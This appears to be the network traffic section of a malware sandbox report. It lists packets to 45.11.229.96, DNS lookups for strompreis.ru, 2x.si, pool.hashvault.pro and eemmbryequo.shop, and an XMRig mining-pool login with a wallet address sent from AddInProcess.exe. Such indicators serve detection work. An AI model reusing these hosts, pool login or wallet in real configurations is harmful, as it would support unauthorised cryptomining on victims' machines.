Sep 19, 2024 02:28:52.725249052 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.730015039 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.730113029 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.734971046 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.133405924 CEST	39001	49959	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.133656979 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.134032965 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.138793945 CEST	39001	49959	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.251595020 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.256606102 CEST	39001	49960	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.256709099 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.285492897 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.290457010 CEST	39001	49960	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.290508986 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.295295000 CEST	39001	49960	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.873044014 CEST	39001	49960	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.874540091 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.874540091 CEST	49960	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.879414082 CEST	39001	49960	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.985784054 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:53.990957022 CEST	39001	49961	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:53.993980885 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.022063017 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.027053118 CEST	39001	49961	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:54.028960943 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.033734083 CEST	39001	49961	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:54.650584936 CEST	39001	49961	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:54.652836084 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.652928114 CEST	49961	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.657963037 CEST	39001	49961	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:54.767817974 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:54.773307085 CEST	39001	49963	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:54.774653912 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.153517962 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.158806086 CEST	39001	49963	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.158860922 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.163650036 CEST	39001	49963	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.448112011 CEST	39001	49963	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.448272943 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.448488951 CEST	49963	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.455585003 CEST	39001	49963	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.595165014 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.600128889 CEST	39001	49964	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.600227118 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.736569881 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.741475105 CEST	39001	49964	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:55.742408037 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:55.747215033 CEST	39001	49964	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.222357035 CEST	39001	49964	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.222431898 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.222562075 CEST	49964	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.227314949 CEST	39001	49964	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.329535007 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.334425926 CEST	39001	49965	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.334498882 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.488789082 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.493603945 CEST	39001	49965	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.494430065 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:56.499193907 CEST	39001	49965	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.952429056 CEST	39001	49965	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:56.954355001 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:57.079775095 CEST	49965	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:57.084630013 CEST	39001	49965	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:58.407576084 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:58.413279057 CEST	39001	49966	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:58.413391113 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:58.437485933 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:58.442370892 CEST	39001	49966	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:58.442483902 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:58.447288036 CEST	39001	49966	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.078119040 CEST	39001	49966	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.078231096 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.078377962 CEST	49966	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.083163023 CEST	39001	49966	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.188829899 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.193878889 CEST	39001	49967	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.193978071 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.218816042 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.223670006 CEST	39001	49967	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.223752022 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.228576899 CEST	39001	49967	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.960474968 CEST	39001	49967	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:59.960586071 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.960680008 CEST	49967	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:59.965439081 CEST	39001	49967	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:00.560029030 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:00.565234900 CEST	39001	49968	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:00.567406893 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:00.890041113 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:00.894891977 CEST	39001	49968	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:00.894957066 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:00.899704933 CEST	39001	49968	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.213581085 CEST	39001	49968	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.213709116 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.213779926 CEST	49968	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.218700886 CEST	39001	49968	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.330382109 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.335380077 CEST	39001	49969	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.335454941 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.359215021 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.364129066 CEST	39001	49969	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.364237070 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.369076014 CEST	39001	49969	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.955017090 CEST	39001	49969	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:01.955065966 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.955199957 CEST	49969	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:01.960007906 CEST	39001	49969	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.064244986 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.069334030 CEST	39001	49970	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.069422960 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.093323946 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.098237038 CEST	39001	49970	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.098299026 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.103085995 CEST	39001	49970	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.717688084 CEST	39001	49970	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.718410015 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.725629091 CEST	49970	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.731050014 CEST	39001	49970	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.888278008 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.893614054 CEST	39001	49971	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.894360065 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.947735071 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.954365015 CEST	39001	49971	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:02.958431959 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:02.964591980 CEST	39001	49971	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:03.534310102 CEST	39001	49971	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:03.534379959 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.543847084 CEST	49971	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.548686028 CEST	39001	49971	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:03.854490995 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.859548092 CEST	39001	49972	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:03.859637976 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.957395077 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.962488890 CEST	39001	49972	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:03.962582111 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:03.967355967 CEST	39001	49972	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:04.511343002 CEST	39001	49972	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:04.512464046 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.512557983 CEST	49972	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.517358065 CEST	39001	49972	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:04.626329899 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.631243944 CEST	39001	49973	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:04.631304979 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.683201075 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.688066006 CEST	39001	49973	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:04.688137054 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:04.693011999 CEST	39001	49973	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:05.259742022 CEST	39001	49973	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:05.259912014 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.259937048 CEST	49973	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.264697075 CEST	39001	49973	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:05.381571054 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.387696981 CEST	39001	49974	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:05.390439987 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.447561026 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.453609943 CEST	39001	49974	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:05.453664064 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:05.459624052 CEST	39001	49974	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:06.035164118 CEST	39001	49974	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:06.035214901 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.035367966 CEST	49974	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.040132046 CEST	39001	49974	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:06.198461056 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.203335047 CEST	39001	49975	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:06.206373930 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.591783047 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.596705914 CEST	39001	49975	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:06.600666046 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:06.605485916 CEST	39001	49975	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.081696987 CEST	39001	49975	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.082362890 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.082520962 CEST	49975	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.087234974 CEST	39001	49975	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.272099972 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.277333021 CEST	39001	49976	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.277440071 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.298888922 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.303689957 CEST	39001	49976	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.303761959 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.308573008 CEST	39001	49976	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.717304945 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:29:07.844394922 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:29:07.930546999 CEST	39001	49976	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:07.930610895 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.930749893 CEST	49976	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:07.935580015 CEST	39001	49976	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:08.049101114 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:08.053973913 CEST	39001	49977	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:08.054048061 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:08.928823948 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:08.933667898 CEST	39001	49977	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:08.934359074 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:08.939125061 CEST	39001	49977	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:09.276680946 CEST	39001	49977	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:09.276797056 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.276906013 CEST	49977	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.281794071 CEST	39001	49977	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:09.392887115 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.397725105 CEST	39001	49978	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:09.397799015 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.434360981 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.439141035 CEST	39001	49978	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:09.439193010 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:09.443931103 CEST	39001	49978	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:10.041965961 CEST	39001	49978	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:10.042032957 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:10.042279005 CEST	49978	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:10.047125101 CEST	39001	49978	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:10.618872881 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:10.623806953 CEST	39001	49979	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:10.623949051 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:11.845437050 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:11.850328922 CEST	39001	49979	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:11.850399971 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:11.855179071 CEST	39001	49979	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.208837986 CEST	39001	49979	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.208909035 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.209029913 CEST	49979	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.213778019 CEST	39001	49979	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.313977957 CEST	49980	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.318890095 CEST	39001	49980	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.318975925 CEST	49980	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.358562946 CEST	49980	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.363411903 CEST	39001	49980	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.363470078 CEST	49980	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:12.368247032 CEST	39001	49980	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.941153049 CEST	39001	49980	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:12.941289902 CEST	49980	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.192615032 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.197593927 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:27.197654963 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.202510118 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:27.581121922 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:27.625648022 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.722907066 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:27.723845005 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.728741884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:27.728809118 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:29:27.733614922 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:29:28.401226044 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:29:28.453771114 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:29:50.440673113 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:29:50.485045910 CEST	49730	80	192.168.2.6	95.179.241.203

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:25:14.283873081 CEST	53410	53	192.168.2.6	1.1.1.1
Sep 19, 2024 02:25:14.598912001 CEST	53	53410	1.1.1.1	192.168.2.6
Sep 19, 2024 02:25:19.134351015 CEST	49175	53	192.168.2.6	1.1.1.1
Sep 19, 2024 02:25:19.142160892 CEST	53	49175	1.1.1.1	192.168.2.6
Sep 19, 2024 02:25:28.033253908 CEST	64325	53	192.168.2.6	1.1.1.1
Sep 19, 2024 02:25:28.040153980 CEST	53	64325	1.1.1.1	192.168.2.6
Sep 19, 2024 02:26:04.577719927 CEST	55806	53	192.168.2.6	1.1.1.1
Sep 19, 2024 02:26:04.589750051 CEST	53	55806	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2024 02:25:14.283873081 CEST	192.168.2.6	1.1.1.1	0xb3a5	Standard query (0)	strompreis.ru	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:19.134351015 CEST	192.168.2.6	1.1.1.1	0xdc62	Standard query (0)	2x.si	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:28.033253908 CEST	192.168.2.6	1.1.1.1	0xbe45	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:26:04.577719927 CEST	192.168.2.6	1.1.1.1	0xb0ac	Standard query (0)	eemmbryequo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 19, 2024 02:25:14.598912001 CEST	1.1.1.1	192.168.2.6	0xb3a5	No error (0)	strompreis.ru	45.11.229.96	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:19.142160892 CEST	1.1.1.1	192.168.2.6	0xdc62	No error (0)	2x.si	172.67.143.156	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:19.142160892 CEST	1.1.1.1	192.168.2.6	0xdc62	No error (0)	2x.si	104.21.27.222	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:28.040153980 CEST	1.1.1.1	192.168.2.6	0xbe45	No error (0)	pool.hashvault.pro	95.179.241.203	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:28.040153980 CEST	1.1.1.1	192.168.2.6	0xbe45	No error (0)	pool.hashvault.pro	45.76.89.70	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:26:04.589750051 CEST	1.1.1.1	192.168.2.6	0xb0ac	No error (0)	eemmbryequo.shop	104.21.39.11	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:26:04.589750051 CEST	1.1.1.1	192.168.2.6	0xb0ac	No error (0)	eemmbryequo.shop	172.67.142.26	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:26:27.213231087 CEST	1.1.1.1	192.168.2.6	0x7ee	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:26:27.213231087 CEST	1.1.1.1	192.168.2.6	0x7ee	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

2x.si

eemmbryequo.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49730	95.179.241.203	80	5320	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Timestamp	Bytes transferred	Direction	Data
Sep 19, 2024 02:25:28.049124956 CEST	568	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU","pass":"x","agent":"XMRig/6.21.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 ms
Sep 19, 2024 02:25:28.681163073 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 30 36 39 34 64 31 30 2d 65 31 39 63 2d 34 61 34 32 2d 62 63 62 63 2d 39 63 32 63 34 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"b0694d10-e19c-4a42-bcbc-9c2c46772b75","job":{"blob":"1010eadeadb706fb6cab1d5e1988ea2965fa575de244d13ddb667d5bb8ee0cab7519871f8af57800000000ad21195c919ad5be37281f8e114b3dce9a720de7198ec68d69f
Sep 19, 2024 02:25:28.891052961 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 30 36 39 34 64 31 30 2d 65 31 39 63 2d 34 61 34 32 2d 62 63 62 63 2d 39 63 32 63 34 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"b0694d10-e19c-4a42-bcbc-9c2c46772b75","job":{"blob":"1010eadeadb706fb6cab1d5e1988ea2965fa575de244d13ddb667d5bb8ee0cab7519871f8af57800000000ad21195c919ad5be37281f8e114b3dce9a720de7198ec68d69f
Sep 19, 2024 02:25:36.392085075 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 30 64 66 61 64 62 37 30 36 66 62 36 63 61 62 31 64 35 65 31 39 38 38 65 61 32 39 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101080dfadb706fb6cab1d5e1988ea2965fa575de244d13ddb667d5bb8ee0cab7519871f8af57800000000d5272b16d02b3f59c383b50e85dce9e8b3722e6fb1b2b89198d63ab25d8779011c","job_id":"1179c01f-06ad-4217-9652-a0df4
Sep 19, 2024 02:25:49.542588949 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 64 64 66 61 64 62 37 30 36 37 37 64 64 38 64 62 31 62 31 65 30 38 37 61 38 39 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108ddfadb70677dd8db1b1e087a89e2094e2f6a252cc0804c00df0e52bb27c8268bd580a629d00000000e5ad48df1946e6ae319cad0e67a7dbde69ba7298251f6fce632537fefac990de0a","job_id":"4c8cc117-dd1f-4930-8eb5-4245b
